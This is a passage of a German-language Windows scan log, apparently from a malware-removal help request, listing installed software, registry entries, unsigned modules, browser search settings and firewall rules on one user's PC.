Catalyst Control Center Next Localization SV (HKLM\...\{379D900B-A785-6DB0-012E-434356A365B3}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{366C4FB5-CF6E-258B-418D-E6D29549A278}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{B10089DE-934F-6E0F-683A-B788F89348DF}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
CD-LabelPrint (HKLM-x32\...\MediaNavigation.CDLabelPrint) (Version:  - )
CEWE Fotowelt (HKLM-x32\...\CEWE Fotowelt) (Version: 7.1.2 - CEWE Stiftung u Co. KGaA)
cewe-fotoservice.de (HKLM-x32\...\cewe-fotoservice.de) (Version: 7.0.3 - CEWE Stiftung u Co. KGaA)
Content Manager (HKLM-x32\...\Content Manager) (Version: 3.18.5.761538 - NNG Llc.)
Disketch Disc-Beschriftungssoftware (HKLM-x32\...\Disketch) (Version: 3.34 - NCH Software)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 416.94 - NVIDIA Corporation) Hidden
Druckerdeinstallation für EPSON XP-900 Series (HKLM\...\EPSON XP-900 Series) (Version:  - Seiko Epson Corporation)
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 19.2 - Thüringer Landesfinanzdirektion)
Epson Event Manager (HKLM-x32\...\{9F205E94-9E42-4486-A92A-DF3F6CB85444}) (Version: 3.10.0061 - Seiko Epson Corporation)
Epson Printer Connection Checker (HKLM-x32\...\{189DE071-E0BC-4BA5-8E34-83D5ED12600B}) (Version: 3.2.0.0 - Seiko Epson Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
Epson Scan 2 (HKLM-x32\...\Epson Scan 2) (Version:  - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 3.00.04 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{28C66F35-69BF-4376-BC80-4D5F4808FF3C}) (Version: 4.6.1 - Seiko Epson Corporation)
EPSON-Handbücher (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.57.0.0 - Seiko Epson Corporation)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{39AB2E37-1A55-4292-A5D3-971E9F70D0F8}) (Version: 2.1.32.0 - MAGIX AG)
GoTo Opener (HKLM-x32\...\{C0F33C38-345C-4C02-B161-11389350C2A5}) (Version: 1.0.533 - LogMeIn, Inc.)
GoToMeeting 10.15.0.19228 (HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\GoToMeeting) (Version: 10.15.0.19228 - LogMeIn, Inc.)
iTunes (HKLM\...\{053441A1-A8BD-486F-B06D-F2B478D5925E}) (Version: 12.9.6.3 - Apple Inc.)
MAGIX Cloud Import (HKLM\...\{E2EC0850-84BF-4A86-842E-4A100473FB22}) (Version: 0.1.0.5 - MAGIX Software GmbH) Hidden
MAGIX Cloud Import (HKLM\...\MX.{E2EC0850-84BF-4A86-842E-4A100473FB22}) (Version: 0.1.0.5 - MAGIX Software GmbH)
MAGIX Connect (HKLM\...\{B0C73D27-EB3E-4D0E-B40D-0141DAF708CC}) (Version: 3.0.0.1 - MAGIX Software GmbH) Hidden
MAGIX Connect (HKLM\...\MX.{B0C73D27-EB3E-4D0E-B40D-0141DAF708CC}) (Version: 3.0.0.1 - MAGIX Software GmbH)
MAGIX Foto & Grafik Designer (HKLM\...\{493376E3-A01C-48CE-8ED6-5B2F4F5E9220}) (Version: 12.1.1.45250 - MAGIX Software GmbH) Hidden
MAGIX Foto & Grafik Designer (HKLM-x32\...\MX.{493376E3-A01C-48CE-8ED6-5B2F4F5E9220}) (Version: 12.1.1.45250 - MAGIX Software GmbH)
MAGIX Foto Manager 16 Deluxe (HKLM\...\{5C06468B-7AB8-4E73-8794-AA6806EB930C}) (Version: 12.0.0.20 - MAGIX Software GmbH) Hidden
MAGIX Foto Manager 16 Deluxe (HKLM-x32\...\MX.{5C06468B-7AB8-4E73-8794-AA6806EB930C}) (Version: 12.0.0.20 - MAGIX Software GmbH)
MAGIX Fotos auf DVD MX Deluxe (HKLM-x32\...\{66F2F163-9155-4776-9BE2-0955120C0E2F}) (Version: 11.0.2.80 - MAGIX AG) Hidden
MAGIX Fotos auf DVD MX Deluxe (HKLM-x32\...\MAGIX_{66F2F163-9155-4776-9BE2-0955120C0E2F}) (Version: 11.0.2.80 - MAGIX AG)
MAGIX Screenshare (HKLM-x32\...\{C5152C6C-5AFB-4779-8576-F6FDE26185A7}) (Version: 4.3.6.1987 - MAGIX AG) Hidden
MAGIX Screenshare (HKLM-x32\...\MAGIX_{C5152C6C-5AFB-4779-8576-F6FDE26185A7}) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM\...\{370FD2B5-6A2F-4BB9-8B5F-F5CE6F0C01E5}) (Version: 7.0.2.6 - MAGIX Software GmbH) Hidden
MAGIX Speed burnR (HKLM-x32\...\MX.{370FD2B5-6A2F-4BB9-8B5F-F5CE6F0C01E5}) (Version: 7.0.2.6 - MAGIX Software GmbH)
MAGIX Travel Maps (HKLM\...\{278F1CA2-6459-40CC-ACCA-13E7F6C175CC}) (Version: 1.0.1.300 - MAGIX Software GmbH) Hidden
MAGIX Travel Maps (HKLM\...\MX.{278F1CA2-6459-40CC-ACCA-13E7F6C175CC}) (Version: 1.0.1.300 - MAGIX Software GmbH)
MAGIX Travel Maps Update (HKLM\...\{47A2B863-62A1-4A7D-8AC1-A293C8994747}) (Version: 1.0.1.385 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe MX Plus (HKLM-x32\...\{02C2B318-E2DF-4EC4-AD1B-9FF3DD774A04}) (Version: 11.0.0.42 - MAGIX AG) Hidden
MAGIX Video deluxe MX Plus (HKLM-x32\...\MAGIX_MSI_Videodeluxe18_plus) (Version: 11.0.0.42 - MAGIX AG)
MAGIX Video deluxe Plus (Demo) (HKLM\...\{57B24FA4-9B76-490A-8B80-B27F118E751A}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Designelemente 1) (HKLM\...\{4481CFAA-0E76-4076-9FB2-CECEF3D22FE3}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Designelemente 2) (HKLM\...\{27DFC18E-C49E-4F51-93DD-5E75CE301B9A}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Filmvorlagen 1) (HKLM\...\{395FA56C-DF0F-4836-A3BB-D705B38ABCA1}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Filmvorlagen 2) (HKLM\...\{B7E1A490-6793-4B18-A803-19AA04197762}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Fotoshow Maker-Stile) (HKLM\...\{388F55AA-7054-43FC-845C-E0A8F549B9AE}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (HKLM\...\{7C50DDAC-FC47-4E7C-8EFD-0CCF6567F5C4}) (Version: 19.0.1.18 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (HKLM\...\MX.{7C50DDAC-FC47-4E7C-8EFD-0CCF6567F5C4}) (Version: 19.0.1.18 - MAGIX Software GmbH)
MAGIX Video deluxe Plus (Menüvorlagen) (HKLM\...\{9EAAA0FF-A318-4593-9616-D977655A8B68}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Migrate Content) (HKLM\...\{A0D08159-E17E-4002-8A91-4B29F0145CB8}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Soundtrack Maker-Stile) (HKLM\...\{D5FF70FA-55AD-4B31-87B7-3BB8CB7EED04}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Titeleffekte) (HKLM\...\{81AD8375-39AB-4EEB-9B08-2A9D50F64F91}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Überblendeffekte) (HKLM\...\{39FC2C3B-14F9-48EE-94CC-615459E1C171}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Update Service 5.7.33.77) (HKLM\...\{89C598BE-D4ED-3125-A8AF-406533E46B19}) (Version: 5.7.33.77 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Vorlagen und Effekte) (HKLM-x32\...\MAGIX_GlobalContent.Video_deluxe_Plus) (Version: 1.0.0.0 - MAGIX Software GmbH)
MAGIX Video deluxe Plus Update (HKLM\...\{D5BDA5D0-2661-430E-94A3-8472BF892554}) (Version: 16.0.4.102 - MAGIX Software GmbH) Hidden
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft OneDrive (HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 de) (HKLM\...\Mozilla Firefox 84.0.2 (x64 de)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.2 - Mozilla)
Mozilla Thunderbird 78.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 78.6.0 (x86 de)) (Version: 78.6.0 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MyEpson Portal (HKLM-x32\...\{3361D415-BA35-4143-B301-661991BA6219}) (Version: 1.1.2.2 - SEIKO EPSON CORPORATION) Hidden
MyEpson Portal (HKLM-x32\...\MyEpson Portal) (Version:  - SEIKO EPSON Corporation)
mz-32 Simulator version 1.0 (HKLM-x32\...\{02920757-F57F-4724-83CC-A99C827792E2}_is1) (Version: 1.0 - Graupner)
Naviextras Toolbox Prerequesities (HKLM-x32\...\{537575D6-3B96-474C-BD8F-DFF667363DBD}) (Version: 1.0.0 - NNG Llc.)
NVIDIA 3D Vision Controller-Treiber 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Grafiktreiber 456.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 456.71 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.38.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.35 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.18.0907 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.18.0907 - NVIDIA Corporation)
Photo & Graphic Designer Update (HKLM\...\{41D70490-924E-470F-847F-CD3BB1A65637}) (Version: 12.5.1.48446 - MAGIX Software GmbH) Hidden
Pinnacle Instant DVD Recorder (HKLM-x32\...\{EF781A5C-58F5-4BFD-87F9-E4F14D382F25}) (Version: 2.00.088 - )
proDAD Heroglyph 2.5 (HKLM-x32\...\proDAD-Heroglyph-2.5) (Version:  - )
proDAD Vitascene 1.0 (HKLM-x32\...\proDAD-Vitascene-1.0) (Version:  - )
Studio 11 (HKLM-x32\...\{110B1ADF-2EAE-4E8F-B501-D2A1E6D8ED9D}) (Version: 11.0 - Pinnacle Systems)
Studio 11 (HKLM-x32\...\{2F952048-3220-4AC7-A206-D01EFC774BB2}) (Version: 11.0.0.0 - Pinnacle Systems) Hidden
Studio 11 Bonus DVD (HKLM-x32\...\{45A1BF92-700A-4408-B95E-79F462E3D67D}) (Version: 11.0.0.0 - Pinnacle Systems)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{E1D7CB46-BAE9-4D58-99C4-582332B1755A}) (Version: 1.13.0.0 - Microsoft Corporation) Hidden
Windows 10-Update-Assistent (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22395 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )
Windows-Treiberpaket - Silicon Laboratories Inc. (silabser) Ports  (05/23/2018 6.7.6.2130) (HKLM\...\C9C3E5CCB43EEF685DD0E2BB4263DDC88C9B3834) (Version: 05/23/2018 6.7.6.2130 - Silicon Laboratories Inc.)
Yahoo! Desktop Login (HKLM-x32\...\{F9AEEC34-CF00-4CBD-9E36-DF9DC4002685}) (Version: 1.00.0001 - Pinnacle Systems) Hidden

Packages:
=========
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-09-13] (Microsoft Corporation)
Ihr Smartphone -> C:\Program Files\WindowsApps\Microsoft.YourPhone_1.20081.117.0_x64__8wekyb3d8bbwe [2020-09-05] (Microsoft Corporation)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-09-30] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-20] (Microsoft Studios) [MS Ad]
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-716491260-3257532223-3478221735-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Peter\AppData\Local\GoToMeeting\17359\G2MOutlookAddin64.dll => Keine Datei
ContextMenuHandlers2-x32: [InCDMenu] -> {950FF917-7A57-46BC-8017-59D9BF474000} => C:\Program Files (x86)\Ahead\InCD\incdshx.dll -> Keine Datei
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} =>  -> Keine Datei
ContextMenuHandlers5-x32: [InCDMenu] -> {950FF917-7A57-46BC-8017-59D9BF474000} => C:\Program Files (x86)\Ahead\InCD\incdshx.dll -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2020-10-01] (NVIDIA Corporation -> NVIDIA Corporation)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Drivers32: [VIDC.MJPG] => C:\Windows\SysWOW64\Pvmjpg30.dll [401408 2005-07-12] (Pegasus Imaging Corporation) [Datei ist nicht signiert]

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Peter\Favorites\Downloadseite von NCH Software.lnk -> hxxp://www.nchsoftware.com/de/index.htm
ShortcutWithArgument: C:\Users\Peter\Desktop\Photovoltaik.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> "hxxp:\\192.168.0.2"

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2018-06-14 11:18 - 2018-06-14 11:18 - 000011776 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\libEGL.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 002013696 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\libGLESv2.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000739840 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-12-17 10:11 - 2015-12-17 10:11 - 000132096 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON Software\Event Manager\epnsm.dll
2009-10-21 16:39 - 2009-10-21 16:39 - 000291328 _____ (SEIKO EPSON CORPORATION) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON Software\Event Manager\LcMgr.dll
2019-02-22 16:01 - 2019-02-22 16:01 - 000704512 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\Configration_00000171\MepCfg.dll
2020-04-17 09:15 - 2020-04-17 09:15 - 000577536 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\MepUploader_00000542\MepUploader.dll
2019-02-22 14:09 - 2019-02-22 14:09 - 000475136 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\Online Manual_00000013\MepFAQ.dll
2018-09-18 11:43 - 2018-09-18 11:43 - 000213504 _____ (simplitec GmbH) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\MrStyler.dll
2018-09-18 11:43 - 2018-09-18 11:43 - 000288256 _____ (simplitec GmbH) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\MrTracker.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000045568 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\bearer\qgenericbearer.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000047616 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\bearer\qnativewifibearer.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000049664 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qdds.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000029696 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qgif.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000037376 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qicns.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000030208 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qico.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000459776 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qjp2.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000236544 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qjpeg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000275456 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qmng.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000023552 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qsvg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000022528 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qtga.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000351744 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qtiff.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000021504 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qwbmp.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000374784 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qwebp.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 001212928 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\platforms\qwindows.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005500416 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Core.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005804544 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Gui.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 001064448 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Network.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 003189248 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Qml.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 002928128 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Quick.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000310784 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Svg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005446144 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Widgets.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000015360 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick.2\qtquick2plugin.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000072192 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Layouts\qquicklayoutsplugin.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000015360 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Window.2\windowplugin.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKU\S-1-5-21-716491260-3257532223-3478221735-1001 -> {70A7EBAE-DA5A-4BBF-ADEA-6ECF768BF958} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=MGX&o=15359&src=kw&q={searchTerms}&locale=de_DE&apn_ptnrs=^JQ&apn_dtid=^YYYYYY^YY^DE&apn_uid=79DE322B-A6B7-46C4-ACAD-51A5594CEA42&apn_sauid=ADB29B8A-9FD7-4DC6-9AFE-C5F3256C5419
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Keine Datei

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2016-07-16 12:47 - 2016-07-16 12:45 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-716491260-3257532223-3478221735-1001\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: Datenträger ist nicht mit dem Internet verbunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{65781923-5A50-4B8F-9101-B10D258E3705}] => (Allow) C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe (MAGIX Software GmbH -> MAGIX)
FirewallRules: [{2EA6A397-2399-407F-8DA7-CC979FB10EC2}] => (Allow) C:\Program Files\Common Files\MAGIX Services\MxCloudSync\MxCloudSync.exe (MAGIX Software GmbH -> MAGIX)
FirewallRules: [{DBAEB576-2FBB-4C5E-887D-253C7D978253}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
FirewallRules: [{DC1C1F3B-A31C-4ABF-9DB8-BAA499E6EC29}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
